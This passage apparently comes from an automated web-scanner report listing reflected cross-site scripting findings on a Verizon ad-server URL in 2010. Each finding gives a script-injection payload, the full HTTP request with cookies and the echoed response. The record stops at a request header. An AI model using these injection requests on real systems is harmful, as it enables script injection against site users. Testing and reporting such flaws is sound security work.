2.522. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d42c"><script>alert(1)</script>f6d635f9dc1 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=8d42c"><script>alert(1)</script>f6d635f9dc1&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=8d42c"><script>alert(1)</script>f6d635f9dc1&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.523. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a695e"><script>alert(1)</script>3d67f979495 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=a695e"><script>alert(1)</script>3d67f979495&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=a695e"><script>alert(1)</script>3d67f979495&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&searc
...[SNIP]...

2.524. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50298"><script>alert(1)</script>30b70b7695c was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=50298"><script>alert(1)</script>30b70b7695c&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
acking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=50298"><script>alert(1)</script>30b70b7695c&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.525. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d475d"><script>alert(1)</script>8efeccc1568 was submitted in the vec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=d475d"><script>alert(1)</script>8efeccc1568&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=d475d"><script>alert(1)</script>8efeccc1568&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.526. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2113b"><script>alert(1)</script>112c77c37aa was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=2113b"><script>alert(1)</script>112c77c37aa&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=2113b"><script>alert(1)</script>112c77c37aa&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.527. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce16"><script>alert(1)</script>fd2661bd909 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=4ce16"><script>alert(1)</script>fd2661bd909&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=4ce16"><script>alert(1)</script>fd2661bd909&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.528. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae4f"><script>alert(1)</script>e79595a1860 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=cae4f"><script>alert(1)</script>e79595a1860&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=cae4f"><script>alert(1)</script>e79595a1860&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.529. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [vsbb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87ca5"><script>alert(1)</script>600a7dbe304 was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=87ca5"><script>alert(1)</script>600a7dbe304&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=87ca5"><script>alert(1)</script>600a7dbe304&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.530. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 879fd"><script>alert(1)</script>280faac10d2 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=879fd"><script>alert(1)</script>280faac10d2&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=879fd"><script>alert(1)</script>280faac10d2&search=" target="_top">
...[SNIP]...

2.531. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2646d"><script>alert(1)</script>9d5d035851 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=2646d"><script>alert(1)</script>9d5d035851&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ervice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=2646d"><script>alert(1)</script>9d5d035851&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.532. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f51e"><script>alert(1)</script>a6ae8c4670f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

